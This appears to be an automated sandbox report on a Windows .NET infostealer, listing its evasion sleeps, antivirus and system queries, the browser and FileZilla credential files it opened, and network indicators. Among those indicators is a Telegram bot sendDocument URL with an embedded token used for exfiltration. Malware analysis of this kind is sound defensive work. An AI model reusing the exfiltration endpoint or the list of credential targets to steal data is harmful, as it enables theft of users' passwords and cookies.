Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598778s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598589s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598454s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598327s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -598098s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597958s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597718s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597592s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597483s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597374s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596828s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596500s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596388s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964 Thread sleep time: -596266s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 2516 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 2352 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: Ls4O6Pmixd.exe, 00000004.00000002.1423799405.00000000005D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Queries volume information: C:\Users\user\Desktop\Ls4O6Pmixd.exe VolumeInformation
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1426211711.00000000127C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

            Remote Access Functionality

MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count shown beside the technique in the report):
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (231), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Masquerading (1), Disable or Modify Tools (1), Virtualization/Sandbox Evasion (251), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (231), Process Discovery (1), Virtualization/Sandbox Evasion (251), Application Window Discovery (1), System Information Discovery (123), Wi-Fi Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (1), Data from Local System (2), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Web Service (1), Encrypted Channel (21), Ingress Tool Transfer (1), Non-Application Layer Protocol (3), Application Layer Protocol (14), Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop

Source | Detection | Scanner | Label
Ls4O6Pmixd.exe | 42% | Virustotal |
Ls4O6Pmixd.exe | 58% | ReversingLabs | Win32.Trojan.SpywareX
Ls4O6Pmixd.exe | 100% | Avira | HEUR/AGEN.1309950
Ls4O6Pmixd.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
get.geojs.io | 104.26.0.100 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://get.geojs.io/v1/ip/geo.json | false | | high
https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument0 | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/ | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/freakcodingspot | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://get.geojs.io | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000026BC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.tele | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://get.geojs.io | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/TheDyer | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002613000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocument(United | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000024CC000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t.me/webster480 | Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Ls4O6Pmixd.exe, 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
104.26.0.100 | get.geojs.io | United States | 13335 | CLOUDFLARENETUS | false
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1576577
                                                  Start date and time:2024-12-17 09:44:02 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 1s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:Ls4O6Pmixd.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:16e8183843e73d742ee2f2d334b8c6c0.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@1/1@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 82%
                                                  • Number of executed functions: 51
                                                  • Number of non-executed functions: 22
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:45:09 | API Interceptor | 32x Sleep call for process: Ls4O6Pmixd.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
 | Order129845.exe | Get hash | malicious | AgentTesla | Browse |
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse |
 | Justificante pago-09453256434687.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse |
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse |
 | pedido-035241.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse |
104.26.0.100 | ZOL2mIYAUH.exe | Get hash | malicious | Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT | Browse |
 | file.exe | Get hash | malicious | Unknown | Browse |
 | file.exe | Get hash | malicious | Unknown | Browse |
 | http://braintumourresearch.org | Get hash | malicious | Unknown | Browse |
 | https://www.filemail.com/t/NU6GESpW | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2FWIA2PParYO43z1bgCVStAX12/ZHVjZXIua2FtZ2FuZ0BjbmVzc3QuZ291di5xYy5jYQ== | Get hash | malicious | Unknown | Browse |
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fkeyconserv.com%2Fskoda%2Ff1mgxnH4u4JYtjrvS13irZ65/am9zZWUub3VlbGxldEBjbmVzc3QuZ291di5xYy5jYQ== | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
 | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bg%C2%ADloba%C2%ADlproc%C2%ADessi%C2%ADngne%C2%ADtwo%C2%ADrk.%E2%80%8Bne%C2%ADt%2Ffghd%2Fgfjfjfg%2FlZUdcjNeQOlJngwGts6Dr8m3/Y2hhZC5yYXNtdXNlbkB0aGVybW9zeXN0ZW1zLmNvbQ== | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
 | https://g.page/r/CbPyKO_ogGK3EAg/review | Get hash | malicious | HTMLPhisher, Tycoon2FA | Browse |
 | P09Qwe9fqsKdQIyTGnGxNs8xS[1] | Get hash | malicious | Tycoon2FA | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
get.geojs.io | Itaxyhi.exe | Get hash | malicious | Phemedrone Stealer | Browse | 172.67.70.233
 | rukT6hBo6P.exe | Get hash | malicious | Phemedrone Stealer | Browse | 172.67.70.233
 | gCK3ozTL7Q.ps1 | Get hash | malicious | Phemedrone Stealer | Browse | 172.67.70.233
 | Activation.exe | Get hash | malicious | Phemedrone Stealer | Browse | 104.26.1.100
 | ZOL2mIYAUH.exe | Get hash | malicious | Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT | Browse | 104.26.0.100
 | WDSecureUtilities(1).exe | Get hash | malicious | Phemedrone Stealer | Browse | 104.26.1.100
 | system.exe | Get hash | malicious | Phemedrone Stealer | Browse | 172.67.70.233
 | B6EGeOHEFm.exe | Get hash | malicious | Phemedrone Stealer | Browse | 104.26.1.100
 | Q60ZbERXWZ.exe | Get hash | malicious | Phemedrone Stealer | Browse | 104.26.1.100
 | nuVM6HVKRG.exe | Get hash | malicious | Phemedrone Stealer | Browse | 104.26.1.100
api.telegram.org | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | Order129845.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | Justificante pago-09453256434687.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | pedido-035241.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TELEGRAMRU | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | 69633f.msi | Get hash | malicious | Vidar | Browse | 149.154.167.99
 | Order129845.exe | Get hash | malicious | AgentTesla | Browse | 149.154.167.220
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | Justificante pago-09453256434687.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | l9IH82eiKw.exe | Get hash | malicious | Unknown | Browse | 149.154.167.220
CLOUDFLARENETUS | X2hna87N3Y.exe | Get hash | malicious | LummaC | Browse | 104.21.50.161
 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.21.67.152
 | https://forms.gle/WXkgv9t1iFkxFXZb7 | Get hash | malicious | HTMLPhisher | Browse | 104.17.25.14
 | RkB7FehGh6.exe | Get hash | malicious | LummaC | Browse | 104.21.2.110
 | MV GOLDEN SCHULTE DETAILS.exe | Get hash | malicious | Snake Keylogger | Browse | 172.67.177.134
 | https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1 | Get hash | malicious | Unknown | Browse | 172.67.181.93
 | c5bnEkMx.ps1 | Get hash | malicious | LummaC | Browse | 104.21.64.1
 | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | Get hash | malicious | Unknown | Browse | 104.21.83.229
 | sEOELQpFOB.lnk | Get hash | malicious | RedLine | Browse | 188.114.97.6
 | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | Get hash | malicious | RedLine, SectopRAT | Browse | 188.114.97.6
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.26.0.100
 | MV GOLDEN SCHULTE DETAILS.exe | Get hash | malicious | Snake Keylogger | Browse | 104.26.0.100
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 104.26.0.100
 | pre-stowage.PDF.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.26.0.100
 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 104.26.0.100
 | hesaphareketi-01.pdf.exe | Get hash | malicious | Snake Keylogger | Browse | 104.26.0.100
 | PURCHASE ORDER TRC-0909718-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 104.26.0.100
 | Justificante pago-09453256434687.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 104.26.0.100
 | pedido-035241.exe | Get hash | malicious | GuLoader, Snake Keylogger, VIP Keylogger | Browse | 104.26.0.100
 | QUOTATION REQUEST - BQS058.exe | Get hash | malicious | MassLogger RAT | Browse | 104.26.0.100
3b5074b1b5d032e5620f69f9f700ff0e | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 149.154.167.220
 | V7giEUv6Ee.bat | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | BwQ1ZjHbt3.bat | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | https://onedefender.xyz/w/a/s/?lp_key=17343c9645d1ac0fef5c105d161ba25127ffc78983&clickid=ctg89et00fes73cmfgu0&trk=fireclk.xyz&language=de&feed=7539&zone=3dcf5f1b&dm=1 | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | Get hash | malicious | Unknown | Browse | 149.154.167.220
 | sEOELQpFOB.lnk | Get hash | malicious | RedLine | Browse | 149.154.167.220
 | ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk | Get hash | malicious | RedLine, SectopRAT | Browse | 149.154.167.220
 | payload_1.hta | Get hash | malicious | RedLine | Browse | 149.154.167.220
 | PAYMENT ADVICE TT07180016-24_pdf.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 149.154.167.220
 | ei0woJS3Dy.lnk | Get hash | malicious | Unknown | Browse | 149.154.167.220
                                                                                          No context
                                                                                          Process:C:\Users\user\Desktop\Ls4O6Pmixd.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1740
                                                                                          Entropy (8bit):5.36827240602657
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qGqZ4vtpv
                                                                                          MD5:821ACABA250A235D1B9929D2700C4832
                                                                                          SHA1:4AE930C9A64528E7FF3E2212D33EE491D3CA49E6
                                                                                          SHA-256:28FB0CEA6BA66156F7F55A5D03546D6DAB831CCD5B4BC7E2449998C9E023428E
                                                                                          SHA-512:982D7B8DDBB2EFCFAD049DF39879E31BC23E0E1EBBA394FCC006E0AB9205223C33F658F69C5E50BEC284D05CB9DF3B86C6F198E7B6D5B1D0F40B0CFA8195FB3A
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.5212062963241255
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:Ls4O6Pmixd.exe
                                                                                          File size:653'312 bytes
                                                                                          MD5:16e8183843e73d742ee2f2d334b8c6c0
                                                                                          SHA1:5167fa0c1f5771e2a24aab9c25633e81bbdae157
                                                                                          SHA256:02d192483999e1acbe80fa6ee612b56d8768033a6018c9a5b95199943c82e683
                                                                                          SHA512:78bf5431ddb73c4fb20de9fd3be00d8a5272a52882636f19a70b49bb871b122e35f71561dbf05aa90db8d3df815597deb1edda2e93070cc078bd7d3ee103052d
                                                                                          SSDEEP:12288:cJpXH/IUgy21XWno5EMbU0+gIT5F7k75aps:cJpXH/idWnoaf6IE753
                                                                                          TLSH:B3D4D024BEE54999F18E83B5D7E864A59FF2F699B14BF3FB160427912F03750C80312A
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...QlCg.........."...0.. ..........%M... ...@....@.. ....................................@................................
